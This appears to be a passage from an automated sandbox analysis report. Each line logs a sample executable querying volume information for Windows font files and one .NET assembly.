          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
